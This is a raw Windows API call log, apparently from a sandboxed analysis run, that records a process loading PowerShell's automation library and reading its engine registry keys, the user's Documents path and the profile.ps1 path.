	[0402.598] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.598] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.598] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0403.062] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0403.063] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0403.063] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0403.063] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0403.063] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0403.063] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0403.063] VirtualQuery (in: lpAddress=0x16bb30, lpBuffer=0x16c9f0, dwLength=0x30 | out: lpBuffer=0x16c9f0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0403.064] CoTaskMemAlloc (cb=0x104) returned 0x34e250
	[0403.064] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e250, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0403.064] CoTaskMemFree (pv=0x34e250) 
	[0403.065] VirtualQuery (in: lpAddress=0x16bb30, lpBuffer=0x16c9f0, dwLength=0x30 | out: lpBuffer=0x16c9f0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0403.067] CoTaskMemAlloc (cb=0x104) returned 0x34e250
	[0403.067] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e250, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0403.067] CoTaskMemFree (pv=0x34e250) 
	[0403.068] CoTaskMemAlloc (cb=0x104) returned 0x34e250
	[0403.068] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e250, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0403.068] CoTaskMemFree (pv=0x34e250) 
	[0403.068] CoTaskMemAlloc (cb=0x104) returned 0x34e250
	[0403.068] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e250, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0403.068] CoTaskMemFree (pv=0x34e250) 
	[0403.069] CoTaskMemAlloc (cb=0x104) returned 0x34e250
	[0403.069] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e250, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0403.070] CoTaskMemFree (pv=0x34e250) 
	[0403.071] CoTaskMemAlloc (cb=0x104) returned 0x34e250
	[0403.071] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e250, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0403.071] CoTaskMemFree (pv=0x34e250) 
	[0403.071] CoTaskMemAlloc (cb=0x104) returned 0x34e250
	[0403.071] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e250, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0403.071] CoTaskMemFree (pv=0x34e250) 
	[0403.072] VirtualQuery (in: lpAddress=0x16bb30, lpBuffer=0x16c9f0, dwLength=0x30 | out: lpBuffer=0x16c9f0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0403.072] VirtualQuery (in: lpAddress=0x16bb30, lpBuffer=0x16c9f0, dwLength=0x30 | out: lpBuffer=0x16c9f0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0403.486] VirtualQuery (in: lpAddress=0x16bb30, lpBuffer=0x16c9f0, dwLength=0x30 | out: lpBuffer=0x16c9f0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0403.502] CoTaskMemAlloc (cb=0x104) returned 0x34e250
	[0403.502] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e250, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0403.502] CoTaskMemFree (pv=0x34e250) 
	[0404.005] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x34e690
	[0404.005] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x34e7a0
	[0404.852] VirtualQuery (in: lpAddress=0x16bb30, lpBuffer=0x16c9f0, dwLength=0x30 | out: lpBuffer=0x16c9f0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0405.305] VirtualQuery (in: lpAddress=0x16bb30, lpBuffer=0x16c9f0, dwLength=0x30 | out: lpBuffer=0x16c9f0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0405.307] VirtualQuery (in: lpAddress=0x16bb30, lpBuffer=0x16c9f0, dwLength=0x30 | out: lpBuffer=0x16c9f0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0405.308] VirtualQuery (in: lpAddress=0x16a580, lpBuffer=0x16b440, dwLength=0x30 | out: lpBuffer=0x16b440*(BaseAddress=0x16a000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0405.322] VirtualQuery (in: lpAddress=0x16bb30, lpBuffer=0x16c9f0, dwLength=0x30 | out: lpBuffer=0x16c9f0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0405.323] VirtualQuery (in: lpAddress=0x16bb30, lpBuffer=0x16c9f0, dwLength=0x30 | out: lpBuffer=0x16c9f0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0405.323] VirtualQuery (in: lpAddress=0x16bb30, lpBuffer=0x16c9f0, dwLength=0x30 | out: lpBuffer=0x16c9f0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0405.323] VirtualQuery (in: lpAddress=0x16bb30, lpBuffer=0x16c9f0, dwLength=0x30 | out: lpBuffer=0x16c9f0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0405.323] VirtualQuery (in: lpAddress=0x16bb30, lpBuffer=0x16c9f0, dwLength=0x30 | out: lpBuffer=0x16c9f0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0405.323] VirtualQuery (in: lpAddress=0x16bb30, lpBuffer=0x16c9f0, dwLength=0x30 | out: lpBuffer=0x16c9f0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0405.323] VirtualQuery (in: lpAddress=0x16bb30, lpBuffer=0x16c9f0, dwLength=0x30 | out: lpBuffer=0x16c9f0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0405.323] VirtualQuery (in: lpAddress=0x16bb30, lpBuffer=0x16c9f0, dwLength=0x30 | out: lpBuffer=0x16c9f0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0405.323] VirtualQuery (in: lpAddress=0x16bb30, lpBuffer=0x16c9f0, dwLength=0x30 | out: lpBuffer=0x16c9f0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0405.323] VirtualQuery (in: lpAddress=0x16bb30, lpBuffer=0x16c9f0, dwLength=0x30 | out: lpBuffer=0x16c9f0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0405.323] VirtualQuery (in: lpAddress=0x16bb30, lpBuffer=0x16c9f0, dwLength=0x30 | out: lpBuffer=0x16c9f0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0405.324] VirtualQuery (in: lpAddress=0x16bb30, lpBuffer=0x16c9f0, dwLength=0x30 | out: lpBuffer=0x16c9f0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0405.324] VirtualQuery (in: lpAddress=0x16bb30, lpBuffer=0x16c9f0, dwLength=0x30 | out: lpBuffer=0x16c9f0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0405.324] VirtualQuery (in: lpAddress=0x16bb30, lpBuffer=0x16c9f0, dwLength=0x30 | out: lpBuffer=0x16c9f0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0405.324] VirtualQuery (in: lpAddress=0x16bb30, lpBuffer=0x16c9f0, dwLength=0x30 | out: lpBuffer=0x16c9f0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0405.324] VirtualQuery (in: lpAddress=0x16bb30, lpBuffer=0x16c9f0, dwLength=0x30 | out: lpBuffer=0x16c9f0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0405.324] VirtualQuery (in: lpAddress=0x16bb30, lpBuffer=0x16c9f0, dwLength=0x30 | out: lpBuffer=0x16c9f0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0405.324] VirtualQuery (in: lpAddress=0x16bb30, lpBuffer=0x16c9f0, dwLength=0x30 | out: lpBuffer=0x16c9f0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0405.324] VirtualQuery (in: lpAddress=0x16bb30, lpBuffer=0x16c9f0, dwLength=0x30 | out: lpBuffer=0x16c9f0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0405.324] VirtualQuery (in: lpAddress=0x16bb30, lpBuffer=0x16c9f0, dwLength=0x30 | out: lpBuffer=0x16c9f0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0405.324] VirtualQuery (in: lpAddress=0x16bb30, lpBuffer=0x16c9f0, dwLength=0x30 | out: lpBuffer=0x16c9f0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0405.324] VirtualQuery (in: lpAddress=0x16bb30, lpBuffer=0x16c9f0, dwLength=0x30 | out: lpBuffer=0x16c9f0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0405.325] VirtualQuery (in: lpAddress=0x16bb30, lpBuffer=0x16c9f0, dwLength=0x30 | out: lpBuffer=0x16c9f0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0405.325] VirtualQuery (in: lpAddress=0x16bb30, lpBuffer=0x16c9f0, dwLength=0x30 | out: lpBuffer=0x16c9f0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0405.325] VirtualQuery (in: lpAddress=0x16bb30, lpBuffer=0x16c9f0, dwLength=0x30 | out: lpBuffer=0x16c9f0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0405.325] VirtualQuery (in: lpAddress=0x16bb30, lpBuffer=0x16c9f0, dwLength=0x30 | out: lpBuffer=0x16c9f0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0405.325] VirtualQuery (in: lpAddress=0x16bb30, lpBuffer=0x16c9f0, dwLength=0x30 | out: lpBuffer=0x16c9f0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0405.325] VirtualQuery (in: lpAddress=0x16bb30, lpBuffer=0x16c9f0, dwLength=0x30 | out: lpBuffer=0x16c9f0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0405.325] VirtualQuery (in: lpAddress=0x16bb30, lpBuffer=0x16c9f0, dwLength=0x30 | out: lpBuffer=0x16c9f0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0405.326] CoTaskMemAlloc (cb=0x104) returned 0x34e8b0
	[0405.326] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0405.326] CoTaskMemFree (pv=0x34e8b0) 
	[0405.328] CoTaskMemAlloc (cb=0x104) returned 0x34e8b0
	[0405.328] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0405.328] CoTaskMemFree (pv=0x34e8b0) 
	[0405.329] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0405.329] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0405.329] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0405.329] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0405.734] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0405.734] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0405.734] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0405.734] VirtualQuery (in: lpAddress=0x16bde0, lpBuffer=0x16cca0, dwLength=0x30 | out: lpBuffer=0x16cca0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0405.739] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0405.739] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0405.739] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0405.739] VirtualQuery (in: lpAddress=0x16bde0, lpBuffer=0x16cca0, dwLength=0x30 | out: lpBuffer=0x16cca0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0405.739] VirtualQuery (in: lpAddress=0x16b630, lpBuffer=0x16c4f0, dwLength=0x30 | out: lpBuffer=0x16c4f0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0405.740] VirtualQuery (in: lpAddress=0x16b630, lpBuffer=0x16c4f0, dwLength=0x30 | out: lpBuffer=0x16c4f0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0405.741] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16dc38 | out: phkResult=0x16dc38*=0x328) returned 0x0
	[0405.741] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16dbbc, lpData=0x0, lpcbData=0x16dbb8*=0x0 | out: lpType=0x16dbbc*=0x1, lpData=0x0, lpcbData=0x16dbb8*=0x56) returned 0x0
	[0405.741] CoTaskMemAlloc (cb=0x5a) returned 0x1b7fde20
	[0405.741] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16db8c, lpData=0x1b7fde20, lpcbData=0x16db88*=0x56 | out: lpType=0x16db8c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16db88*=0x56) returned 0x0
	[0405.741] CoTaskMemFree (pv=0x1b7fde20) 
	[0405.741] RegCloseKey (hKey=0x328) returned 0x0
	[0405.741] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16dc38 | out: phkResult=0x16dc38*=0x328) returned 0x0
	[0405.741] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16dbbc, lpData=0x0, lpcbData=0x16dbb8*=0x0 | out: lpType=0x16dbbc*=0x1, lpData=0x0, lpcbData=0x16dbb8*=0x56) returned 0x0
	[0405.741] CoTaskMemAlloc (cb=0x5a) returned 0x1b7fde20
	[0405.741] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16db8c, lpData=0x1b7fde20, lpcbData=0x16db88*=0x56 | out: lpType=0x16db8c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16db88*=0x56) returned 0x0
	[0405.741] CoTaskMemFree (pv=0x1b7fde20) 
	[0405.741] RegCloseKey (hKey=0x328) returned 0x0
	[0405.742] CoTaskMemAlloc (cb=0x20c) returned 0x1b7c7970
	[0405.742] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b7c7970 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0405.742] CoTaskMemFree (pv=0x1b7c7970) 
	[0405.742] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x16d7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0405.742] CoTaskMemAlloc (cb=0x20c) returned 0x1b7c7970
	[0405.742] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b7c7970 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0405.742] CoTaskMemFree (pv=0x1b7c7970) 
	[0405.742] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x16d7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0405.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x16d990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0405.743] SetErrorMode (uMode=0x1) returned 0x1
